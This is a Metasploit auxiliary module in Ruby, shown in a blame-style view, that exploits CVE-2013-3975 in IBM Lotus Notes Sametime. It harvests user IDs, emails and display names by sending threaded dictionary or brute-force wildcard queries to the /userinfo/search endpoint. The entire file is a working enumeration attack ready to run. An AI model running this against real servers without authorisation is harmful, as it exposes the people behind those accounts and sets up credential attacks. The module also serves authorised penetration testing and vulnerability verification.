metasploit-framework/modules/auxiliary/gather/ibm_sametime_enumerate_user...

308 lines
10 KiB
Ruby
Raw Permalink Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'enumerable'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
2014-01-17 21:31:51 +00:00
'Name' => 'IBM Lotus Notes Sametime User Enumeration',
'Description' => %q{
This module extracts usernames using the IBM Lotus Notes Sametime web
interface using either a dictionary attack (which is preferred), or a
bruteforce attack trying all usernames of MAXDEPTH length or less.
},
2014-01-17 21:31:51 +00:00
'Author' =>
[
'kicks4kittens' # Metasploit module
],
2014-05-22 16:34:04 +00:00
'References' =>
[
[ 'CVE', '2013-3975' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
2014-01-17 23:59:03 +00:00
'DefaultOptions' =>
{
'SSL' => true
},
2014-01-17 21:31:51 +00:00
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 27 2013'
2014-01-17 21:31:51 +00:00
))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [ true, 'The path to the userinfo script', '/userinfo/search']),
OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
OptEnum.new('TYPE', [true, 'Specify UID or EMAIL', 'UID', ['UID', 'EMAIL'] ]),
OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2])
])
register_advanced_options(
[
OptString.new('SpecialChars', [false, 'Specify special chars (e.g. -_+!@&$/\?)', '' ]),
OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']),
OptString.new('SUFFIX', [ false, 'Defines set post for each quess (e.g. _adm)', '']),
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
])
end
def setup
# setup the desired charset
@charset = []
# setup array to hold user data
@user_data = []
if datastore['DICT'].blank?
# populate charset - lowercase only as search is case insensitive
case datastore['CHARSET']
when "alpha"
("a".."z").each { |alpha| @charset.push(alpha) }
when "num"
("0".."9").each { |num| @charset.push(num) }
when "alphanum"
("a".."z").each { |alpha| @charset.push(alpha) }
("0".."9").each { |num| @charset.push(num) }
end
if datastore['SpecialChars']
datastore['SpecialChars'].chars do | spec |
@charset.push(Rex::Text.uri_encode(spec))
end
end
2016-02-01 22:06:34 +00:00
print_status("Performing Bruteforce attack")
vprint_status("Using CHARSET: [#{@charset.join(",")}]")
else
2016-02-01 22:06:34 +00:00
print_status("Performing dictionary based attack (#{datastore['DICT']})")
end
if datastore['DICT'].blank? and datastore['MAXDEPTH'] > 2
# warn user on long runs
2016-02-01 22:06:34 +00:00
print_status("Depth level #{datastore['MAXDEPTH']} selected... this may take some time!")
end
# create initial test queue and populate
@test_queue = Queue.new
if datastore['DICT'].blank?
@charset.each { |char| @test_queue.push(char) }
else
::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) }
2016-02-01 22:06:34 +00:00
vprint_status("Loaded #{@test_queue.length} values from dictionary")
end
@depth_warning = true
@retries = []
end
def run
2016-02-01 22:06:34 +00:00
print_status("Testing for IBM Lotus Notes Sametime User Enumeration flaw")
# test for expected response code on non-existant uid/email
if datastore['TYPE'] == "UID"
random_val = Rex::Text.rand_text_alpha(32)
else
random_val = Rex::Text.rand_text_alpha(32) +"@"+ Rex::Text.rand_text_alpha(16) + ".com"
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => random_val
}
})
begin
if res.nil?
2016-02-01 22:06:34 +00:00
print_error("Timeout")
return
elsif res.code != 200
2016-02-01 22:06:34 +00:00
print_error("Unexpected response from server (Response code: #{res.code})")
return
2014-02-06 16:16:26 +00:00
elsif JSON.parse(res.body)
# valid JSON response - valid response for check
2016-02-01 22:06:34 +00:00
print_good("Response received, continuing to enumeration phase")
end
rescue JSON::ParserError,
2016-02-01 22:06:34 +00:00
print_error("Error parsing JSON: Invalid response from server")
return
end
# start test handler
test_handler
# ouput results
output_results
end
def test_handler
2016-02-01 22:06:34 +00:00
print_status("Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)")
test_length = 1 # initial test length set
until @test_queue.empty?
t = []
nt = datastore['Threads'].to_i
nt = 1 if nt == 0
if @test_queue.length < nt
# work around issue where threads not created as the queue isn't large enough
nt = @test_queue.length
end
begin
1.upto(nt) do
t << framework.threads.spawn("Module(#{self.refname})-#{rhost}", false, @test_queue.shift) do |test_current|
Thread.current.kill if not test_current
# provide feedback to user on current test length
if datastore['DICT'].blank? and test_current.length > test_length
test_length = test_current.length
2016-02-01 22:06:34 +00:00
print_status("Beginning bruteforce test for #{test_length} character strings")
end
res = make_request(test_current)
# check response to see if an error was returned, if so wait 1 second and retry
if res.nil? and not @retries.include?(test_current)
# attempt test again as the server was too busy to respond
# correctly - error returned
2016-02-01 22:06:34 +00:00
print_error("Error reading JSON response, attempting to redo check for \"#{test_current}\"")
@test_queue.push(test_current)
@retries << test_current
if @retries.length == 10
2016-02-01 22:06:34 +00:00
print_error("Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)")
end
elsif res
# check response for user data
check_response(res, test_current)
end
end
end
t.each {|x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
end
end
end
# make request and return response
def make_request(test_current)
# combine test string with PRE and POST variables
tstring = datastore['PREFIX'] + test_current + datastore['SUFFIX'] + "*"
# Apply timing information to pause between making requests - not a timeout
if datastore['TIMING'] > 0
Rex::sleep(datastore['TIMING'])
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => tstring
}
})
end
# check the response for valid user information
def check_response(res, test_current)
begin
# check response exists AND that it validates as JSON before proceeding
if res.code.to_i == 200 and not JSON.parse(res.body).blank?
# successful response - extract user data
extract_user(res)
# extend test_queue to search for further data (not if dictionary in use)
extend_queue(test_current) if (datastore['DICT'].blank?)
end
rescue JSON::ParserError
# non-JSON response - server may be overloaded
return error
end
end
def extract_user(res)
# extract user data if not already present
begin
userinfo = JSON.parse(res.body)
unless @user_data.flatten.include?(userinfo['uid'])
@user_data << [ userinfo['uid'], userinfo['mail'] || "-", userinfo['externalName'] || "-" ]
# print newly discovered users straight to the screen if verbose mode is set
2016-02-01 22:06:34 +00:00
vprint_good("New user found: #{userinfo['uid']}")
report_user(userinfo['uid'])
end
rescue JSON::ParserError
2016-02-01 22:06:34 +00:00
print_error("Error reading JSON string, continuing")
end
end
# extend the test queue if MAXDEPTH value not exceeded
# checks made to ensure duplicates are not created when extending
# process:
#
# when a user is found searching for 'a' the queue for 'a' is extended as
# only the first user starting with 'a' will be returned (e.g. 'aanderson')
# To find all users the queue must be extended by adding 'aa' through to 'az'
def extend_queue(test_current)
if test_current.length < datastore['MAXDEPTH']
@charset.each do | char |
@test_queue.push(test_current + char)
end
elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1
2016-02-01 22:06:34 +00:00
vprint_status("Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests")
@depth_warning = false
end
end
def report_user(username)
report_note(
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => 'sametime',
:type => 'ibm_lotus_sametime_user',
:data => "#{username}",
:update => :unique_data
)
end
def output_results
# print output table
user_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Users",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"UID",
"Email",
"CommonName"
])
# populate tables
@user_data.each do | line |
user_tbl << [ line[0], line[1], line[2] ]
end
if not user_tbl.to_s.empty?
2016-02-01 22:06:34 +00:00
print_good("#{@user_data.length} users extracted")
print_line(user_tbl.to_s)
else
2016-02-01 22:06:34 +00:00
print_error("No users discovered")
end
end
end